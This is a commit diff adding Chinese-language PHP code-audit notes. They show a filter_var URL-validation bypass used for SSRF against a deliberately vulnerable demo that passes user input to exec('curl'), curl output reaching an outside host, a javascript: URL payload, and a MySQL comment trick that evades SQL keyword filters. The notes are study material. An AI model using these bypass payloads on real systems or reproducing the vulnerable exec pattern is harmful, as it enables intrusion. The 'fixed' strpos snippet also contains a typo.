10/6

Author: jiangsir404

README.md

@@ -19,7 +19,7 @@
 - [ ] move_uploaded_file
 - [ ] 其他 [php函数默认配置引发的安全问题](http://skysec.top/2018/08/17/php%E5%87%BD%E6%95%B0%E9%BB%98%E8%AE%A4%E9%85%8D%E7%BD%AE%E5%BC%95%E5%8F%91%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/#openssl-verify-%E5%87%BD%E6%95%B0)
 - [ ] 误用htmlentities函数引发的漏洞 (http://sec-redclub.com/archives/964/)
-- [ ] filter_var函数缺陷 (http://sec-redclub.com/archives/925/)
+- [x] filter_var函数缺陷 (http://sec-redclub.com/archives/925/)
 
 
 ## 一些资源

filter_var函数缺陷.md

@@ -0,0 +1,95 @@
+(PHP 5 >= 5.2.0, PHP 7)
+filter_var — 使用特定的过滤器过滤一个变量
+
+    mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )
+
+
+常见的filter 过滤器
+```
+FILTER_VALIDATE_EMAIL
+FILTER_VALIDATE_DOMAIN
+FILTER_VALIDATE_IP
+FILTER_VALIDATE_URL
+```
+
+比较常用的当属FILTER_VALIDATE_URL了吧，但是它存在很easy的绕过问题:
+
+随便给了两个实例都可以bypass
+```
+<?php 
+
+$url = "javascript://alert(1)";
+$url = "0://1";
+if(filter_var($url,FILTER_VALIDATE_URL)){
+	echo 'Bypass it';
+}
+```
+
+### demo1
+
+```
+<?php
+   $argv = $_GET['url'];
+   echo "Argument: ".$argv."\n";
+   // check if argument is a valid URL
+   if(filter_var($argv, FILTER_VALIDATE_URL)) {
+      // parse URL
+      $r = parse_url($argv);
+      print_r($r);
+      // check if host ends with baidu.com
+      if(preg_match('/baidu\.com$/', $r['host'])) {
+         // get page from URL
+         exec('curl -v -s "'.$r['host'].'"', $a);
+         print_r($a);
+      } else {
+         echo "Error: Host not allowed";
+      }
+   } else {
+      echo "Error: Invalid URL";
+   }
+
+```
+
+有三重验证，filter_var,parse_url,preg_match 的bypass
+
+在这篇文章： https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51 给出了绕过方法:
+
+```
+url=0://www.blogsir.com.cn:80,baidu.com:80/
+```
+
+> 中间的逗号也可以换成 `;` `%0a` `%0d`
+
+原理: 
+```
+许多URL结构保留一些特殊的字符用来表示特殊的含义，这些符号在URL中不同的位置有着其特殊的语义。字符“;”, “/”, “?”, “:”, “@”, “=” 和“&”是被保留的。除了分层路径中的点段，通用语法将路径段视为不透明。 生成URI的应用程序通常使用段中允许的保留字符来分隔。例如“；”和“=”用来分割参数和参数值。逗号也有着类似的作用。
+
+例如，有的结构使用name;v=1.1来表示name的version是1.1，然而还可以使用name,1.1来表示相同的意思。当然对于URL来说，这些保留的符号还是要看URL的算法来表示他们的作用。
+
+例如，如果用于hostname上，URL“http://evil.com;baidu.com”会被curl或者wget这样的工具解析为host:evil.com，querything:baidu.com
+```
+
+这样我们就可以绕过限制访问到我们的vps上来了。
+
+```
+Argument: 0://www.blogsir.com.cn:80,baidu.com:80/
+Array
+(
+    [scheme] => 0
+    [host] => www.blogsir.com.cn:80,baidu.com
+    [port] => 80
+    [path] => /
+)
+* Rebuilt URL to: www.blogsir.com.cn:80,baidu.com/
+*   Trying 123.206.65.167...
+* Connected to www.blogsir.com.cn (123.206.65.167) port 80 (#0)
+> GET / HTTP/1.1
+> Host: www.blogsir.com.cn
+> User-Agent: curl/7.47.0
+> Accept: */*
+```
+
+参考: 
+
+Some trick in ssrf and unserialize(): https://www.jianshu.com/p/80ce73919edb
+http://skysec.top/2018/03/15/Some%20trick%20in%20ssrf%20and%20unserialize()/

代码审计圈/other.md

@@ -0,0 +1,30 @@
+## strpos
+```
+if(stripos($url,'.')){
+	die("unknow url");
+}
+
+if(stripos($url,'.') == False){
+	die('unkonw url');
+}
+```
+
+这段代码是存在漏洞的，因为当.出现在第一位时候返回值为0
+
+正常写法:
+
+```
+if(stripo($url,'.') === False){
+	die('unkonwn url');
+}
+
+
+## 注入
+
+	preg_match("/\b(select|insert|update|delete)\b/i",$message)
+
+然后使用/*!00000select*/ 来bypass 语义分析的绕过
+
+> \b”匹配单词边界，不匹配任何字符
+
+/*!*/ 只在mysql中有用，在别的数据库中这只是注释，但是在mysql，/*!select 1*/可以成功执行，在语句前可以加上5位数字，代表版本号，表示只有在大于该版本的mysql中不作为注释